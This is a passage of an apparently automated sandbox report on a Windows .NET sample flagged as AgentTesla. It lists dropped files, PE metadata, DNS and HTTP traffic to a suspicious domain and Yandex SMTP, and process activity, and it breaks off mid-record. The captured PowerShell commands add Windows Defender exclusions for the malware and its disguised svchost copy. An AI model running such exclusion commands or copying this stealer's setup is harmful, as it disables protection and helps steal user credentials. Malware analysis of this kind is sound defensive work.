                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iuekw4yc.egl.ps1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjobcix1.uu4.psm1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3ochp5k.jrz.ps1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wixb2r5b.jug.ps1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\Documents\20210408\PowerShell_transcript.445817.Mn7w2WZt.20210408125033.txt
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):844
                                                                            Entropy (8bit):5.347838101785983
                                                                            Encrypted:false
                                                                            SSDEEP:24:BxSAGxvBnSqx2DOXUWeSudpWKHjeTKKjX4CIym1ZJXEudh:BZyvhtoO+SS4KqDYB1ZKSh
                                                                            MD5:352BBCDF64C2EA53997B4F3DF4DA18F4
                                                                            SHA1:4F5BFC94DCDC05EECE0539B3BA0C8F599777EBD3
                                                                            SHA-256:0F8EC89B9964801655EB83648FDAD3C5A3F25F810E616FFCEB27A2D7C820E4FC
                                                                            SHA-512:0ECA64AD0A633C49EC4965A935353C920A37CB7E8ADD2D84C948C58C3EA8BFD4AD5D4A074A7D33A06A5DF3CAECDB379152D6EDBE2AF887A39C5F01EF69AE627F
                                                                            Malicious:false
                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408125102..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\qINcOlwRud.exe -Force..Process ID: 1364..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408125102..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\qINcOlwRud.exe -Force..
                                                                            C:\Users\user\Documents\20210408\PowerShell_transcript.445817.P1Qvf8QW.20210408125034.txt
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):918
                                                                            Entropy (8bit):5.392041724419666
                                                                            Encrypted:false
                                                                            SSDEEP:24:BxSA1xvBnSqx2DOXUWeSuIE9WRHjeTKKjX4CIym1ZJXVuIEV:BZHvhtoO+SA0RqDYB1Z7AV
                                                                            MD5:322946366FBBBD90E8A2E1EB1E47A7C7
                                                                            SHA1:EC5704A11E6E7B1BF4849B7FB8B19093BB15D067
                                                                            SHA-256:79EEA929E405F34A7C07E10D51B1196F9F3FF10ABB8BE8CD75404A3699A3FAAF
                                                                            SHA-512:9643EABA8FBE4749E70B5C498C02116E7884677DD1D3CEECE79AE9DB523DDFA1509D40B94BFBFA812F940684759E20A07034365D77FA518E4517DA3C0FD00D7B
                                                                            Malicious:false
                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408125103..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..Process ID: 3880..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408125103..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..
                                                                            C:\Users\user\Documents\20210408\PowerShell_transcript.445817.yTtmKb3_.20210408125031.txt
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):917
                                                                            Entropy (8bit):5.400354377516213
                                                                            Encrypted:false
                                                                            SSDEEP:24:BxSA1xvBnSqx2DOXUWeSuIE9W5HjeTKKjX4CIym1ZJXWuIEV:BZHvhtoO+SA05qDYB1ZUAV
                                                                            MD5:A1285A990F54CA979E18F6B1D48A24F6
                                                                            SHA1:943654DB90876375D96B5B5B3CB1A4BAA92DAD0E
                                                                            SHA-256:AB360F03022252F0FE4B98B5AE67CD09F00A93FD3D2DBFBBC39EE1B53762A3D3
                                                                            SHA-512:1B2392C8A18DD8DD995BCA10DF60519058341D8166B2E7861D64B66222B4476B8EDA516D4B33D90212D91822F8BFA356D5E52745F07BE056AF8088B7DB8C0922
                                                                            Malicious:false
                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210408125055..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 445817 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..Process ID: 908..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210408125056..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe -Force..
                                                                            C:\Users\user\QTSKUnyljdzYWpkbMIVLIBDYJvtcjEA
                                                                            Process:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):5184376
                                                                            Entropy (8bit):3.0316320496109426
                                                                            Encrypted:false
                                                                            SSDEEP:24576:P0/SheovRu0/SheovRYdSRdSfE0/SheovRYdSRdSfC:y
                                                                            MD5:929FC50359431E9E10EBB42953036B8A
                                                                            SHA1:DD2479918A4C8655A03E177581127D39794670D2
                                                                            SHA-256:549967FFC50E3D09F3D129C4C17B537DB6F7566060BFAE3F4CB8B775F5D29796
                                                                            SHA-512:3BE259001E0BBBB4C7BC4DA1757D57CF2E6C5C82E883C1CFCBF223988676810B2891F38CB7E42EFA3446C5361CD6DD906FC20DCA88E172D09F6ED02F4E7E99B5
                                                                            Malicious:false
                                                                            Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 176 10 0 0 6 0 0 0 0 0 0 158 207 10 0 0 32 0 0 0 224 10 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 32 11 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 72 207 10 0 83 0 0 0 0 224 10 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 11 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 164 175 10 0 0 32 0 0 0 176 10 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96
                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):5.935771952119223
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:qINcOlwRud.exe
                                                                            File size:46592
                                                                            MD5:d6b29add344d2284845f133b8505126e
                                                                            SHA1:fdb44b36f8c31a60a47db4f4ce6d4975367d7a7c
                                                                            SHA256:552a8d763c86bb50ded18cf8f790f18828c471ec5a4d3cac71eaf7693314a04c
                                                                            SHA512:7ec6e7f8f2ebe947b8b05eb4880d6a34d8b92965e7548fb5038716d5912bc299e3078b755373df9b7414b61154e625d7b689fbd1f39dfb4363f382449bce7ff6
                                                                            SSDEEP:768:67mDHfLLLkF0FenHiwAGflA7qOSn8bQ1xHWBnBeladzvRwyx0klmJc7z6GkZCcoz:7/ngF0m/87qOSn8bQ1xHWBnBeladzvRj
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..j...J........... ........@.. ....................... ......}.....@................................

                                                                            File Icon

                                                                            Icon Hash:30828a8c8c828010

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4089ce
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Authenticode Signature

                                                                            Signature Valid:
                                                                            Signature Issuer:
                                                                            Signature Validation Error:
                                                                            Error Number:
                                                                            Not Before, Not After
                                                                              Subject Chain
                                                                                Version:
                                                                                Thumbprint MD5:
                                                                                Thumbprint SHA-1:
                                                                                Thumbprint SHA-256:
                                                                                Serial:

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x8974           0x57          .text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa000           0x4664        .rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x7400           0x1480        .text
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x10000          0xc           .reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x69d4 | 0x6a00 | False | 0.358453714623 | data | 6.41745283228 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x4664 | 0x4800 | False | 0.14892578125 | data | 4.10630489014 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xa130 | 0x4028 | dBase III DBT, version number 0, next free block index 40 | |
RT_GROUP_ICON | 0xe158 | 0x14 | data | |
RT_VERSION | 0xe16c | 0x30c | data | |
RT_MANIFEST | 0xe478 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2021
Assembly Version | 1.0.0.0
InternalName | Dimbono.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | Dimbono
ProductVersion | 1.0.0.0
FileDescription | Dimbono
OriginalFilename | Dimbono.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 12:50:22.570270061 CEST | 192.168.2.3 | 8.8.8.8 | 0x271c | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 12:50:22.735455990 CEST | 192.168.2.3 | 8.8.8.8 | 0x4193 | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 12:52:56.284813881 CEST | 192.168.2.3 | 8.8.8.8 | 0x1509 | Standard query (0) | smtp.yandex.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:52:56.386115074 CEST | 192.168.2.3 | 8.8.8.8 | 0x6880 | Standard query (0) | smtp.yandex.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 12:50:22.623327971 CEST | 8.8.8.8 | 192.168.2.3 | 0x271c | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:50:22.623327971 CEST | 8.8.8.8 | 192.168.2.3 | 0x271c | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:50:22.748990059 CEST | 8.8.8.8 | 192.168.2.3 | 0x4193 | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:50:22.748990059 CEST | 8.8.8.8 | 192.168.2.3 | 0x4193 | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:52:56.298275948 CEST | 8.8.8.8 | 192.168.2.3 | 0x1509 | No error (0) | smtp.yandex.com | smtp.yandex.ru | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:52:56.298275948 CEST | 8.8.8.8 | 192.168.2.3 | 0x1509 | No error (0) | smtp.yandex.ru | | 77.88.21.158 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:52:56.399106979 CEST | 8.8.8.8 | 192.168.2.3 | 0x6880 | No error (0) | smtp.yandex.com | smtp.yandex.ru | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:52:56.399106979 CEST | 8.8.8.8 | 192.168.2.3 | 0x6880 | No error (0) | smtp.yandex.ru | | 77.88.21.158 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• myliverpoolnews.cf

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49682 | 104.21.56.119 | 80 | C:\Users\user\Desktop\qINcOlwRud.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 12:50:22.679862022 CEST | 91 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html HTTP/1.1
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host: myliverpoolnews.cf
Connection: Keep-Alive
Apr 8, 2021 12:50:22.716279984 CEST | 92 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 10:50:22 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 08 Apr 2021 11:50:22 GMT
Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.html
cf-request-id: 0952b3d4600000177e56ad2000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YXBfuqv1DKsr3kYv9lDZknqZTQudOELsBXUbs%2BSSZ8Bsuq00QBPcgZC4CQk52NwhIRljIVGOCdJQ6pIoGWQM4X8gtYq17%2FmaGN%2BbruVScxTtW7s%3D"}],"max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63caef33ce07177e-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Apr 8, 2021 12:50:23.799249887 CEST | 1394 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html HTTP/1.1
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host: myliverpoolnews.cf
Apr 8, 2021 12:50:23.824533939 CEST | 1396 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 10:50:23 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 08 Apr 2021 11:50:23 GMT
Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html
cf-request-id: 0952b3d8c10000177e2fa4d000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4fGAoHxW8%2BxaGArqNeg5sPQGlUehvpIKet4Wb%2B6KB0p0FoLjSMgEX5YgXLYOjOcQ1dFo1Xr7tL6vahM%2FwxL5SRLexqct11fmNS5ykPfpS0X%2Bvis%3D"}],"max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63caef3ac82e177e-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Apr 8, 2021 12:50:26.081063986 CEST | 2703 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html HTTP/1.1
UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
Host: myliverpoolnews.cf
Apr 8, 2021 12:50:26.103168964 CEST | 2704 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 08 Apr 2021 10:50:26 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 08 Apr 2021 11:50:26 GMT
Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
cf-request-id: 0952b3e1a90000177e14a04000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YwgF2iZHx%2BhZCOKIwBE5dKVJBaKnU4FIqGT32q%2FE5R%2FgtJzj7GYaYwsoc6SSFx6qyQFN8OGjqylSeAdUQ8GZMQzGjWNDuQAAgTpgw1sad3GmMjs%3D"}],"max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 63caef490e3e177e-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Apr 8, 2021 12:50:22.814704895 CEST | 104.21.56.119 | 443 | 192.168.2.3 | 49683 | CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Wed Mar 31 02:00:00 CEST 2021 | Thu Mar 31 01:59:59 CEST 2022 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad
Certificate chain (intermediate): Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Not Before Mon Jan 27 13:48:08 CET 2020 | Not After Wed Jan 01 00:59:59 CET 2025

Behavior

System Behavior

General

Start time: 12:50:20
Start date: 08/04/2021
Path: C:\Users\user\Desktop\qINcOlwRud.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\qINcOlwRud.exe'
Imagebase: 0xab0000
File size: 46592 bytes
MD5 hash: D6B29ADD344D2284845F133B8505126E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 12:50:29
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe' -Force
Imagebase: 0x1180000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 12:50:29
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:29
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qINcOlwRud.exe' -Force
Imagebase: 0x1180000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 12:50:30
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
